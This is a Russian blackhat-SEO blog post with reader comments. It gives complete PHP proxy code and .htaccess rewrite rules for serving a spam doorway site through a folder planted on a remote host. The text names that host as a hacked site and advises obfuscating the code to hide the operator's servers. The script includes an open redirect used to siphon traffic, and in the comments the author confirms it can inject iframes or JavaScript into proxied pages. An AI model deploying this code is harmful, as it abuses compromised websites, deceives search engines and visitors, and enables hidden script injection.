Проксификация доров lime.black

Проксификация доров

Есть замечательная штука под названием SiteProxy. Если вы делаете доры там, где нежелательно занимать много места (даже не представляю, где), SiteProxy просто необходим.
http://provit.fr/lb/ – вот пример, как работает проксификация.
Как она делается?

Генерим большой дорвей у себя на хосте. http://ourhost.com/dor1/ для примера.
Создаем на удаленном хосте где-нибудь папку (убедившись, что она не будет закрыта от поисковиков в robots.txt) и в ней файл index.php со следующим кодом:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113

<?php error_reporting(0);   if( isset($_GET['go']) ) { $go = $_GET['go']; header("Location: $go"); exit; }   define('FRONTEND_ADDRESS', ''); define('BACKEND_ADDRESS', 'http://ourhost.com/dor1/'); // указываем урл дорвея, который мы сгенерили (бэкэнд) define('BACKEND_ADDRESS_IP', ''); // можно вписать айпи хоста, где лежит реальный дор - не будет тратиться время на резолв домена, не критично define('FRONTEND_NAME', ''); define('BACKEND_NAME', '');     define('ID', ''); define('SID', preg_replace('/[^\w]/', '-', ((isset($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME'])));   if (isset($_SERVER['HTTP_IF_MODIFIED_SINCE']) && preg_match('/^.+\.(jpg|jpeg|gif|png|svg|js|css|mp3|ogg|mpe?g|avi|zip|gz|bz2?|rar)$/', $_SERVER['REQUEST_URI'])) { header($_SERVER['SERVER_PROTOCOL'] . '/1.1 304 Not Modified'); exit; }   $query['id'] = ID; $query['sid'] = SID; $query['realvisitor'] = base64_encode($_SERVER['REMOTE_ADDR']); $query['realvisitora'] = base64_encode($_SERVER['HTTP_USER_AGENT']); $query = $query + $_GET; if (isset($_GET['_request_'])) { unset($query['_request_']); $_request_url = BACKEND_ADDRESS . str_ireplace(' ', '%20', $_GET['_request_']) . '?' . http_build_query($query); } else { $_request_url = BACKEND_ADDRESS . '?' . http_build_query($query); }   $cookies = array(); foreach($_COOKIE as $key=>$value) { $cookies[] = $key . '=' . urlencode($value); } $cookies = implode("; ", $cookies);   $ch = curl_init(); $url = $_request_url; if (BACKEND_ADDRESS_IP) { $url_data = parse_url($url);   curl_setopt($ch, CURLOPT_HTTPHEADER, array('Host: ' . $url_data['host']));   if (!empty($url_data['query'])) { $url_data['path'] .= '?' . $url_data['query']; } $url = $url_data['scheme'] . '://' . BACKEND_ADDRESS_IP . $url_data['path']; } curl_setopt($ch, CURLOPT_URL, $url);   if ($_SERVER['REQUEST_METHOD'] == 'POST') { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $_POST); } curl_setopt($ch, CURLOPT_USERAGENT, 'Site Proxy'); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookies); if (isset($_SERVER["HTTP_REFERER"]) && $_SERVER["HTTP_REFERER"] && strpos(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST), parse_url(FRONTEND_ADDRESS, PHP_URL_HOST)) === FALSE) { curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]); } curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);   $response = curl_exec($ch);   $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE));   if (preg_match('/^.+\.(jpg|jpeg|gif|png|svg|js|css|mp3|ogg|mpe?g|avi|zip|gz|bz2?|rar)$/', $_SERVER['REQUEST_URI']) && preg_match("/Last-Modified: (.*)/i", $header, $matches)) { if (isset($matches[1])) { header('Last-Modified: ' . $matches[1]); header('Expires: Thu, 31 Dec 2037 23:55:55 GMT'); header('Cache-Control: max-age=315360000');   preg_match("/Content-Type: (.*)/i", $header, $matches); if (isset($matches[1])) { header('Content-type: ' . $matches[1]); } preg_match("/Content-Length: (.*)/i", $header, $matches); if (isset($matches[1])) { header('Content-Length: ' . $matches[1]); } } }   $headers = explode("\n", $header); foreach($headers as $header){ if (strpos($header, 'Set-Cookie: ') === 0) { $header = str_ireplace('Set-Cookie: ', '', $header); $header = explode('; ', $header); $cookie[0] = explode('=', $header[0]); if(strlen($cookie[0][0]) && strlen($cookie[0][1])){ setcookie($cookie[0][0], $cookie[0][1], time()+60*60*24*365, '/'); } } elseif (strpos($header, 'Location: ') === 0) { header(str_ireplace(BACKEND_ADDRESS, FRONTEND_ADDRESS, $header)); } }   $body = str_ireplace(BACKEND_ADDRESS, FRONTEND_ADDRESS, $body); $body = str_ireplace(BACKEND_NAME, FRONTEND_NAME, $body);   echo $body; ?>

Там же создаем .htaccess

1 2 3 4 5 6 7 8

AddDefaultCharset UTF-8   Options +FollowSymlinks RewriteEngine On RewriteBase /folder/path/ // вписываем относительный путь до папки, где лежит SiteProxy RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)\?*$ index.php?_request_=$1 [L,QSA]

Готово.
Если передать к дору-прокси get-параметр go, то сработает редирект.
http://provit.fr/lb/?go=http://google.com вот так, к примеру. Полезно, чтобы сливать трафик через внутренние ссылки.
Если собираетесь заливать прокси на пирог, не забудьте обфусцировать код, чтоб не палить свои хосты.

p.s. есть поверье, что, если громко вслух произнести “ШЕЛЛ”, то в дверь тут же постучатся из отдела К.

1. Strannic:

   14.11.2014 в 02:20

   Полезная вещь!
   Сам пользуюсь, и код знакомый,
   с theebooksellers и трумедиа )

   Ответить
2. alex:

   14.11.2014 в 18:57

   Посоветуйте абсуфикатор, что бЫ работал данный скрипт после его “закатки”)

   Ответить
   • lime:

     14.11.2014 в 18:59

     http://wb0.ru/phpobf.php вот самый простой вариант
     Что-нибудь посерьезней обычно платно.

     Ответить
3. alkoustas:

   14.11.2014 в 22:08

   сделай подписку на email
   фидбурнер или что-то такое

   Ответить
   • lime:

     14.11.2014 в 22:11

     http://lime.black/feed вот же, стандартный вордпрессовский RSS. Думал, сейчас все ридеры умеют сами ленту находить. Добавлю, пожалуй, в сайдбар.

     Ответить
4. Sergey:

   19.11.2014 в 15:21

   можно ли через этот код в доноре подставлять свой ифрейм или хотя бы яваскрипт в код вставлять?

   Ответить
   • lime:

     19.11.2014 в 15:29

     да

     Ответить
     • Sergey:

       19.11.2014 в 18:07

       можешь пример показать?

       Ответить
       • lime:

         19.11.2014 в 18:19

         echo “inject”;

         Ответить
5. Forstin:

   02.12.2014 в 20:06

   Спасибо огромное за то что пишешь! Вопрос: как быть c nginx?

   Ответить
   • lime:

     02.12.2014 в 20:43

     Че-то типа такого:
     location /folder/ {
     try_files $uri $uri/ /folder/index.php?$args;
     }

     Ответить
     • Forstin:

       03.12.2014 в 16:22

       А если нет доступа в nginx.conf, то никак?

       Ответить
       • lime:

         03.12.2014 в 18:17

         Наверное, никак.

         Ответить
6. Fubu_By:

   02.01.2015 в 12:17

   А как отрабатывает, если на доноре стоит ссылка, которую редиректит 301

   Ответить
   • lime:

     03.01.2015 в 22:47

     Хороший вопрос.
     Проверь и нам расскажешь.

     Ответить
7. watson:

   08.01.2015 в 03:07

   а как бы без htaccess использовать, чтоб можно было заинклудить код в файл и вызывался б только при наличии определенного кея в get запросе?

   Ответить
8. Яша:

   01.02.2015 в 04:48

   А как то можно на пироге из корня работать ? domen.com/url-dora.html или url-dora/ ?

   Ответить
   • lime:

     01.02.2015 в 04:53

     Да. Надо в корневой .htaccess вписать реврайты. Что-то типа такого:
     RewriteCond %{REQUEST_FILENAME} !-f
     RewriteCond %{REQUEST_FILENAME} !-d
     RewriteRule ^(.*)\?*$ /proxyfolder/index.php?_request_=$1 [L,QSA]

     Ответить
9. ена:

   06.02.2015 в 09:53

   не получается нихуа( 500 ошибка
   куда копать подскажи

   Ответить
   • lime:

     06.02.2015 в 09:56

     Сорри, штатный телепат на выходные уже ушел.

     Ответить
     • ена:

       06.02.2015 в 09:58

       )))) хаха
       только морда грузиться, а если тыкать по внутренним ссылкам то уже грузиться не донор а сам сайт.. надеюсь ясно выразился)

       Ответить
       • lime:

         06.02.2015 в 10:01

         .htaccess не подцепился наверное

         Ответить
         • ена:

           06.02.2015 в 10:24

           Что же делать( Как исправить, в логах ошибок нет

           Ответить
10. Гоша:

    28.02.2015 в 09:59

    Подскажите у кого из корня получилось запроксировать не портя индексную страницу пирога ? выложите работающий пример .
    Кстати очень хороший блог спасибо автору ;)